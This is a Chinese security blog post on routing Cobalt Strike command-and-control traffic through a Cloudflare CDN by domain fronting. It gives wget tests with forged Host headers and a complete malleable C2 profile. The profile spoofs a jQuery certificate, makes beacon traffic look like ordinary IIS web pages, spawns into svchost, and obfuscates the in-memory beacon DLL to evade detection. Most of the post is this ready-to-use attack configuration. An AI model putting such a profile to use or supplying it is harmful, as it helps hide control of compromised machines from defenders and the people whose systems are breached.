cs配置cdn实现域名上线

admin 2021年11月30日19:53:48cs配置cdn实现域名上线已关闭评论182 views字数 6792阅读22分38秒阅读模式

前期准备

  • 国外VPS,用于放置 teamserver
  • 谷歌邮箱账号
  • cloudflare.com/ 免费cdn
  • cobalt strike

将cdn绑定teamserver的ip,之后,启动teamserver +profile

域前置原理

正常情况下
在cs上上传个HTML文件
用wget下载访问

wget -U demo -q -O - http://target.com/index.html
hello world!!!
访问返回结果
如果出现522代表cdn未生效
利用header头让cdn跳转到指定的服务器
wget -U demo -q -O - http://arya.ns.cloudflare.com/index.html --header "Host: target.com"
访问下载,返回结果
hello world!!!

我们可以通过修复cs的配置文件,强制让cdn跳转到我们指定的域名
cs的配置文件原理

1.png

1.png

请求过程

  1. 首先由客户端发起请求经过cdn,之后通过header跳转到我们指定的域名

    (需要在http-get的添加header头,还有http-post添加header头,这样使get和post都按照设置好的规则去走流量)
  2. server端接收到get数据,并按照设置的header头,去跳转到我们的服务器
  3. 由server持续通信,需要用到分段传输,(重要)(http-stager这个规则主要是为了上线来设定,需要在上面添加header头,重定向到我们的服务)

之后完成的c2的配置文件

cdn.profile

#
# Amazon browsing traffic profile
# 
# Author: @harmj0y
#

https-certificate {
    set keystore "./cobaltstrike.store";
    set password "123456";
    set L   "Mountain View";
    set C   "US";
    set ST  "CA";
    set CN  "jquery.com";
    set O   "jQuery";
    set OU  "Certificate Authority";
    set validity "365";
}
# SpawnTo,选择对应位数的程序,不能带有UAC权限,最好是通常也会跟外部进行网络通信的程序
# 这里没有找到合适的x64程序(启动不了),还是用默认的rundll32.exe
#set spawnto_x86 "%windir%\\System32\\svchost.exe -k netsvcs";
#set spawnto_x64 "%windir%\\System32\\spoolsv.exe -k netsvcs";
post-ex{

     set spawnto_x86 "%windir%\\System32\\svchost.exe -k netsvcs";
}

# 分段传输
set host_stage "true"; # 使用http、https、DNS上线的主机,将会使用stagers.set

set sleeptime "5000";
set jitter    "35";
set maxdns    "255";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36";



http-get {

    set uri "/Sample/DownloadFile";

    client {
        
        header "Host" "cdn.target.com
";
        header "Cookie" "ASP.NET_SessionId=zywxteesnq4eryyslpnestmn";   
        header "Referer" "https://cdn.target.com
";

        metadata {
            base64url;
            parameter "fileName";
        }
        parameter "relativeUrl" "/Scripts/jquery.min.js";
        parameter "v" "js";
        parameter "s" "0.4456841254";
        
    }

    server {

        
        header "Cache-Control" "private";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-UA-Compatible" "IE=edge";

        output {
           netbios;  
           prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a {    margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
           append "</td></tr><tr><td>&nbsp;</td><td></td></tr><tr><td>&nbsp;</td><td></tr></table></body></html>";
            print;
        }
    }
}

http-post {
    
     set uri "/Sample/UploadFile";
     set verb "GET";

    client {
        
        header "Host" "cdn.target.com
";
        header "Accept" "*/*";
        header "Content-Type" "multipart/form-data";
        header "Referer" "https://cdn.target.com
";
        

        output {
            base64url;
            parameter "fileName";
        }
        parameter "relativeUrl" "/upload/";
        parameter "s" "0.4456841254";
        id {
           base64url;
           parameter "v";
          }
        
    }

    server {

        
        header "Cache-Control" "private";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-UA-Compatible" "IE=edge";

        output {
           netbios;  
           prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a {    margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
           append "</td></tr><tr><td>&nbsp;</td><td></td></tr><tr><td>&nbsp;</td><td></tr></table></body></html>";
            print;
        }
    }
}

# 内存指示器
stage {
    set userwx "false"; 
    set stomppe "true";
    set obfuscate "true";
    set name "srv.dll";
    set cleanup "true";

    # Values captured using peclone agaist a Windows 10 version of explorer.exe
    set checksum "0";
 #set compile_time "18 Sep 2013 06:49:18";
 set entry_point "650688";
 set image_size_x86 "4661248";
 set image_size_x64 "4661248";
 set rich_header "\x3e\x98\xfe\x75\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x7a\xf9\x90\x26\x73\x81\x03\x26\xfc\xf9\x90\x26\x17\xa4\x93\x27\x79\xf9\x90\x26\x7a\xf9\x91\x26\x83\xfd\x90\x26\x17\xa4\x91\x27\x65\xf9\x90\x26\x17\xa4\x95\x27\x77\xf9\x90\x26\x17\xa4\x94\x27\x6c\xf9\x90\x26\x17\xa4\x9e\x27\x56\xf8\x90\x26\x17\xa4\x6f\x26\x7b\xf9\x90\x26\x17\xa4\x92\x27\x7b\xf9\x90\x26\x52\x69\x63\x68\x7a\xf9\x90\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";

    # CS 3.12 "Obfuscate and Sleep" for HTTP Beacons

    set sleep_mask "true";
    transform-x86 { # transform the x86 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend null bytes
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "This program cannot be run in DOS mode" ""; # Remove this text
        strrep "beacon.dll" ""; # Remove this text
    }
    transform-x64 { # transform the x64 rDLL stage
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # prepend null bytes
        strrep "ReflectiveLoader" "execute"; # Change this text
        strrep "beacon.x64.dll" ""; # Remove this text
    }

    stringw "jQuery"; # Add string to binary
}

http-stager {
 
 client {
        
        header "Host" "cdn.target.com
";
        header "Accept-Encoding" "gzip, deflate";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Referer" "https://cdn.target.com
";
   }
    server {
        header "Cache-Control" "private";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "X-Frame-Options" "SAMEORIGIN";
        header "X-UA-Compatible" "IE=edge";
        header "Server" "Microsoft-IIS/8.5";
        header "Connection" "close";

        output {
           
           prepend "<!DOCTYPE html><html><head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /><meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" /><title>error</title><link type=\"text/css\" href=\"/Bundles/Styles/default?v=jcDrc3BM0rvvbyoRqXm6nS0wStXCRu2ResEgd8oiV9s1\" rel=\"stylesheet\" id=\"easyuiTheme\" /><style type=\"text/css\">td {padding: 2px 0px 8px 10px;}td.message {color: gray;font-size: 20px;font-weight: bold;vertical-align: top;}a {    margin-top: 5px !important;}</style><script src=\"/Bundles/Scripts/Min?v=jpQ71ZQzD4PFDWENTQd5gWlmIDMIyF3bSZyzYa6y_1k1\"></script></head><body><table border=\"0\" cellpadding=\"\" cellspacing=\"0\" ><col width=\"32\" /><col /><tr style=\"height:32px\"><td class=\"message\">";
           append "</td></tr><tr><td>&nbsp;</td><td></td></tr><tr><td>&nbsp;</td><td></tr></table></body></html>";
            print;
        }
    }
}

注意只能使用http

参考

cdn上线

https://0x20h.com/p/8dee.html

https://www.chainnews.com/articles/348984046030.htm

https://evi1cg.me/archives/Domain_Fronting.html

https://www.anquanke.com/post/id/210848

https://xz.aliyun.com/t/2796

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月30日19:53:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cs配置cdn实现域名上线http://cn-sec.com/archives/654925.html